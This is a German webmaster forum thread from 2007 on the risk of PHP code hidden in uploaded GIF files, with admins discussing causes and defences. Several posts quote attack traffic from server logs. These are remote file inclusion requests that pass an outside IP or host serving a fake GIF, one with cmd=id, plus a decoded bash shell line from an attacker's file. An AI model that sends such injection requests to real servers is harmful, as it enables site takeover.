Anzeige - [Interessiert an einer Anzeige?]
(?) Tags raten (?) (edit)
 
Reply to this topicStart new topicStart Poll
> Gefahr von PHP Code in GIF Grafikdateien
pangu
Geschrieben am: Do 9.08.2007, 14:51
Report PostQuote Post

AyomRank 6
************

Gruppe: Member (aktiv)
Beiträge: 828
Mitglied seit: 29.07.2005




--------------------
Jonglieren lernen nette Community rund ums Jonglieren °°°
Top
PMEmail PosterUsers WebsiteICQ
Top
 
 
jAuer
Jürgen Auer - freiberufl. Programmierer
#2 Geschrieben am: Do 9.08.2007, 15:41 (+00:49)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Experten Entwicklung
Beiträge: 2154
Mitglied seit: 4.02.2006


Im Prinzip nichts neues, trotzdem danke für den Hinweis. Man kann das ja nicht oft genug wiederholen.

Wenn ich allerdings das

QUOTE
Schauen wir uns an, welche Leute richtige Boliden, hoch leistungsfähige Webserver betreiben, können wir ahnen, wohin der Weg führen wird. Wir kritisieren damit keineswegs unerfahrene Anwender. Schließlich beginnt jeder Mensch irgendwann einmal seinen Weg und lernt dazu. Es gibt aber auch genügend verantwortungslose Menschen, denen es schlicht egal ist, wie sicher ihr Server ist. Für sie ist nur interessant, mit dem Besitz eines eigenen Servers im Kreis von Bewunderern zu prahlen, während sie beim ersten Sicherheitsproblem bereits nicht mehr wissen, welche Schritte nun notwendig sind. Selbst simpelste Dinge werden in diversen Foren erfragt und oft genug wird dann eine "Schritt für Schritt" Anleitung eingefordert, "weil man sich das lange Lesen in oft englischsprachigen Dokumenten ersparen möchte".


lese, dann frage ich mich allerdings manchmal, ob man nicht die entsprechenden Fragen in Foren knallhart löschen sollte. Insbesondere dann, wenn sich das bei manchen Nutzern wiederholt.


--------------------
Web-Anwendung 3.0: Ein Online-Kalender für Termine vieler Filialen.

server-daten: Web-Datenbanken als Online - CRM - Lösung.
Konzentrieren Sie sich auf Ihr Kerngeschäft - nutzen Sie eine schlanke, schnelle Online-Datenbank von verschiedenen Standorten.
Top
PMEmail PosterUsers Website
Top
 
rocoloco
#3 Geschrieben am: Do 9.08.2007, 15:45 (+00:03)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 248
Mitglied seit: 6.08.2007


scheisse sad.gif


--------------------
Wer anderen eine Grube gräbt, hat nichts zu tun.
Top
PMEmail Poster
Top
 
sd12
#4 Geschrieben am: So 12.08.2007, 14:31 (+2d 22:46)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3574
Mitglied seit: 3.03.2004


Es ist richtig, dass dieses Problem existiert!

ABER:

Welcher Idiot lässt es zu, dass PHP Dateien hochgeladen werden können?
Welcher verdeppte Admin hat den Befehl system aktiv?

Unterschätz das Problem dennoch nicht...


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
David T.
#5 Geschrieben am: So 12.08.2007, 16:37 (+02:06)
Report PostQuote Post

AyomRank 4
********

Gruppe: Member (aktiv)
Beiträge: 109
Mitglied seit: 30.07.2006


Die hier gezeigten "Exploits" basieren jedoch alle auf der Annahme, dass der Dateiname des Uploads immer gleich bleibt. Wenn er von exploit.php nach img001202.gif umbenannt wird, lässt sich die Datei nicht mehr ausführen (vorausgesetzt der Systemadmin lässt nicht auch gif-Dateien durch den PHP-Parser rauschen).

QUOTE (sd12 @ So 12.08.2007, 15:31)
Welcher verdeppte Admin hat den Befehl system aktiv?

Selbst wenn jedoch Funktionen wie system() deaktiviert sind, kann man einen beträchtlichen Schaden anrichten.

QUOTE (rocoloco @ Do 9.08.2007, 16:45)
scheisse sad.gif

Danke für deine qualifizierte, hochbrisante Meldung.


--------------------
Top
PMEmail PosterUsers Website
Top
 
- Matthias -
#6 Geschrieben am: So 12.08.2007, 16:51 (+00:13)
Report PostQuote Post

AyomRank 9
******************

Gruppe: Member (aktiv) II
Beiträge: 2361
Mitglied seit: 10.10.2005


Der unerfahrene Anwender sollte sowieso nicht an seinem Server "herumschrauben", wenn er von dessen Inhalten abhängig ist, sprich davon lebt. Bestandteil des Artikels ist daher auch die gängige Panikmache...
Top
PMEmail PosterUsers WebsiteICQ
Top
 
Sascha Ahlers
#7 Geschrieben am: So 12.08.2007, 17:38 (+00:46)
Report PostQuote Post

AyomRank 8
Group Icon

Gruppe: Experten Entwicklung
Beiträge: 1697
Mitglied seit: 27.12.2004


QUOTE (sd12 @ So 12.08.2007, 15:31)
[...] Welcher Idiot lässt es zu, dass PHP Dateien hochgeladen werden können?
Welcher verdeppte Admin hat den Befehl system aktiv? [...]

ODER:

Welcher halbwegsvernünftige Admin hat bitte Endung wie GIF, JPG oder PNG zum Parsen mittels PHP freigegeben?!


--------------------
Joseph Joubert: "Der Verstand kann uns sagen, was wir unterlassen sollen. - Aber das Herz kann uns sagen, was wir tun müssen."

Sicherheit beim Programmieren: Top 10 application vulnerabilities in 2007
Top
PMEmail PosterUsers WebsiteICQ
Top
 
sd12
#8 Geschrieben am: So 12.08.2007, 18:30 (+00:51)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3574
Mitglied seit: 3.03.2004


Vorausgesetzt, das Bilddateien nicht durch den PHP Parser gelassen werden, genügt die einfache Prüfung der Dateiendung. Warum wird NUR der Filetyp geprüft? Am besten beides Prüfen.

Hier aber noch konstruktive Hilfe für diejenigen welche angst haben, dass Sie fehlerhfte Scripte haben...

Macht eine Subdomain für Eure Uploads. Diese Subdomain hat einfach kaum rechte...

Ganz hilfreich zum Thema Apache Security ist auch diese Seite:
http://www.linux-magazin.de/heft_abo/ausga...r_den_webserver


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
jAuer
Jürgen Auer - freiberufl. Programmierer
#9 Geschrieben am: So 12.08.2007, 18:50 (+00:20)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Experten Entwicklung
Beiträge: 2154
Mitglied seit: 4.02.2006


QUOTE (sd12 @ So 12.08.2007, 14:31)
Es ist richtig, dass dieses Problem existiert!

ABER:

Welcher Idiot lässt es zu, dass PHP Dateien hochgeladen werden können?
Welcher verdeppte Admin hat den Befehl system aktiv?


QUOTE (Sascha Ahlers @ So 12.08.2007, 17:38)
Welcher halbwegsvernünftige Admin hat bitte Endung wie GIF, JPG oder PNG zum Parsen mittels PHP freigegeben?!


Eure Einwände sind allesamt nachvollziehbar - für diejenigen, die sich mit den Details auskennen. Nur erlebe ich - gerade hier - immer wieder das Gegenteil: Jemand fragt etwas und erhält eine Erläuterung. Und dann fragt er erneut etwas und man hat den Eindruck, daß die - womöglich sicherheitskritischen - PHP-Befehle wie chinesische Schriftzeichen nur hin- und hergeschoben werden, ohne irgendein Verständnis für das, was diese Funktionen machen. Einzig entscheidend ist, daß es am Ende klappt - so wie sich das der Fragende vorstellt. Was damit plötzlich auch noch klappt, ist dem Fragenden völlig unbekannt.

Und das Problem gibt es nicht nur hier: Es gibt ja regelmäßig Anwendungen, da funktioniert etwas nicht - also werden die Rechte hochgesetzt. Simples Beispiel, schon mehrfach gelesen:

Frage: Ich will in meine bis jetzt statische Seiten PHP einbauen, muß ich jetzt alle Dateiendungen ändern? (PR-Verlust)
Antwort: Nee, konfiguriere deinen Server so, daß er auch .html parst.

Und es ist fast zu wetten, daß manche damit Schwierigkeiten haben und dann nicht bloß das Html-Parsen erlauben, sondern dann eben alle Dateien durchjagen - '*.*' funktioniert wahrscheinlich.

Etwas funktioniert nicht wie gewünscht, also wird eine stärkere Funktion genutzt - was die sonst macht? Keine Ahnung.

Abgesehen davon kann man auch mit hochladbaren Html-Seiten Mist bauen - eingebundenes JavaScript wird dann plötzlich mit den Vertrauensrechten der Plattform ausgeführt.

PS: Simples Beispiel: Jemand schreibt in einem Forum, google würde die Domain als 'kann Ihren Computer schädigen' ausgeben. Leute aus dem Forum gucken nach, eingebundener iFrame auf eine Site mit Exploits, google hat also recht. Und dann natürlich: 'Keine Ahnung, wie', dann werden Passwörter geändert - als ob für so etwas ein Passwort notwendig wäre. Aber wenn sich google dann zwei Wochen Zeit läßt, bis der Hinweis verschwindet, da regt sich der Besitzer darüber auf.


--------------------
Web-Anwendung 3.0: Ein Online-Kalender für Termine vieler Filialen.

server-daten: Web-Datenbanken als Online - CRM - Lösung.
Konzentrieren Sie sich auf Ihr Kerngeschäft - nutzen Sie eine schlanke, schnelle Online-Datenbank von verschiedenen Standorten.
Top
PMEmail PosterUsers Website
Top
 
sd12
#10 Geschrieben am: So 12.08.2007, 19:27 (+00:36)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Moderatoren
Beiträge: 3574
Mitglied seit: 3.03.2004


Leider muss ich jAuer fast überall recht geben...


--------------------
************************
Treiber f[r das Kezboard ist [berfl[ssig.
Top
PMEmail PosterICQMSN
Top
 
jAuer
Jürgen Auer - freiberufl. Programmierer
#11 Geschrieben am: So 19.08.2007, 13:58 (+6d 18:31)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Experten Entwicklung
Beiträge: 2154
Mitglied seit: 4.02.2006


So, grade bei mir gesehen:

Aufrufe:

/live/help.php?css_path=http://217.117.147.4/sugar_canon/s.gif?
/php/mambo/index2.php?_REQUEST%5Boption%5D=com_content&_REQUEST%5BItemid%5D=1&GLOBALS=&mosConfig_absolute_path=http://217.117.147.4/sugar_canon/s.gi
/dotproject/includes/db_adodb.php?baseDir=http://217.117.147.4/sugar_canon/s.gif?

und analog (mir wirds zu blöd, die ganzen Parameter rauszukopieren):

/SQuery/lib/armygame.php
/phplive/help.php
/bridge/enigma/E2_header.inc.php
/admin.php
/mambo/index.php

/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://217.117.147.4/sugar_canon/s.gif?/

Und ruft man das s.gif direkt ab, dann ist das ein 'zerbrochenes Gif' mit Inhalt

QUOTE
<?php
echo ("Morfeus hacked you");
?>


Sprich: Das wird fleißig eingesetzt.


--------------------
Web-Anwendung 3.0: Ein Online-Kalender für Termine vieler Filialen.

server-daten: Web-Datenbanken als Online - CRM - Lösung.
Konzentrieren Sie sich auf Ihr Kerngeschäft - nutzen Sie eine schlanke, schnelle Online-Datenbank von verschiedenen Standorten.
Top
PMEmail PosterUsers Website
Top
 
profo
#12 Geschrieben am: So 19.08.2007, 19:28 (+05:29)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 242
Mitglied seit: 19.01.2007


Um kurz zu vervollständigen, die Blödmänner versuchen es mit jeder Endung:

GET /components/com_simpleboard/file_upload.php?sbp=http://***.com/tool20.dat?cmd=id
GET /mail/index.php?site_path=http://***.com/imag/stringa.txt?
GET /wiki/index.php/index.php?z=http://***.jp/icons/fold?

usw....


--------------------
Forenverzeichnis, Blogverzeichnis und Wikiverzeichnis ohne Backlinkfplicht
E-Mail mit mailde.de - Einfach E-Mail!
beziehungs-kiste.net - Das Tratschforum für Singles, Paare und Familien
Top
PMEmail PosterUsers Website
Top
 
jAuer
Jürgen Auer - freiberufl. Programmierer
#13 Geschrieben am: So 19.08.2007, 19:42 (+00:14)
Report PostQuote Post

AyomRank 9
Group Icon

Gruppe: Experten Entwicklung
Beiträge: 2154
Mitglied seit: 4.02.2006


QUOTE (profo @ So 19.08.2007, 19:28)
Um kurz zu vervollständigen, die Blödmänner versuchen es mit jeder Endung:

Aber nicht bei mir, bei mir sind bloß PHP-Dateien und gif-Endungen aufgetaucht.

Das ist allerdings auch ein IIS, bei dem alle PHP-Dateien mit 404 beantwortet werden.

Vor ein paar Tagen hatte ich mal den:

/admin/business_inc/saveserver.php?thisdir=Textdatei von einem Server

Die Textdatei existiert immer noch - nein, ich poste keinen Link. Die hat u.a komplette Brute-Force - FTP-Angriffe und base64-codierte Blöcke. Decodiert man die, dann sind das komplette kleine C-Programme, die einen Port und eine Shell aufmachen:

CODE
system("echo welcome to ...  shell && /bin/bash -i");


Da ist dann mein Server nicht mehr mein Server.


--------------------
Web-Anwendung 3.0: Ein Online-Kalender für Termine vieler Filialen.

server-daten: Web-Datenbanken als Online - CRM - Lösung.
Konzentrieren Sie sich auf Ihr Kerngeschäft - nutzen Sie eine schlanke, schnelle Online-Datenbank von verschiedenen Standorten.
Top
PMEmail PosterUsers Website
Top
 
PH
#14 Geschrieben am: So 19.08.2007, 22:17 (+02:35)
Report PostQuote Post

AyomRank 7
**************

Gruppe: Member (aktiv)
Beiträge: 1132
Mitglied seit: 29.08.2004


So mach ichs:

1- alle hochgeladenen Bilder (oder Dateien, die sich als solche ausgeben) laufen über ein noexe /tmp
2- Bilder werden automatisch auf 99% Grösse resized (da bleibt kein Code übrig)
3- dann in ein Verzeichnis verschoben mit einem htaccess deny from all (ausnahme: die eigene IP des Webservers)
4- die Bilder werden dann selbst über ein gesichertes php-Skript ausgegeben (nach der Art photo.php?foto_id=542 mit file_get_contents)
Top
PMEmail Poster
Top
 
profo
#15 Geschrieben am: So 19.08.2007, 22:40 (+00:22)
Report PostQuote Post

AyomRank 5
**********

Gruppe: Member (aktiv)
Beiträge: 242
Mitglied seit: 19.01.2007


Coole Tricks. Die Verkleinerung finde ich besonders gut! Ansonsten lasse bei mir meist noch einen clamdscan (Antivirus) über Uploads laufen.


--------------------
Forenverzeichnis, Blogverzeichnis und Wikiverzeichnis ohne Backlinkfplicht
E-Mail mit mailde.de - Einfach E-Mail!
beziehungs-kiste.net - Das Tratschforum für Singles, Paare und Familien
Top
PMEmail PosterUsers Website
Top
 
Thema wird von 0 Benutzer(n) gelesen (0 Gäste und 0 anonyme Benutzer)
0 Mitglieder:
Trackback-Url: http://www.ayom.com/track/t/19933

Topic Options Reply to this topicStart new topicStart Poll

 


> Ähnliche Themen
Domain in Gefahr? noobie 164 1 Sa 26.07.2008, 20:10
Probleme mit neuem Google Analytics-Code bestätigt Peter Schneider 822 12 Mo 2.06.2008, 07:58
PHP-Code schützen radarin 241 8 So 13.01.2008, 22:23
Code ändern, aber ...? japsa 377 6 Mi 7.11.2007, 13:05
Strukurierung des HTML/CSS code Kabir 202 2 Di 25.09.2007, 17:16
Lokale Ergebnisse, Gefahr? VoinG 939 22 Mo 24.09.2007, 13:17
Meinen RSS-Feed als Code für andere Webmaster SPACEart 384 4 Fr 31.08.2007, 16:24
Code in 2000 HTML-Dateien einfügen David Cooper 304 8 Mo 27.08.2007, 13:47
[S] Google AdWords Promotion Code Philipp_R 2873 3 Mi 1.08.2007, 16:48
Wie entsteht ein solcher Code Ronald Nickel 565 12 So 15.07.2007, 10:21




Anzeige - [Interessiert an einer Anzeige?]



Anzeigen


[Interessiert an einer Anzeige?]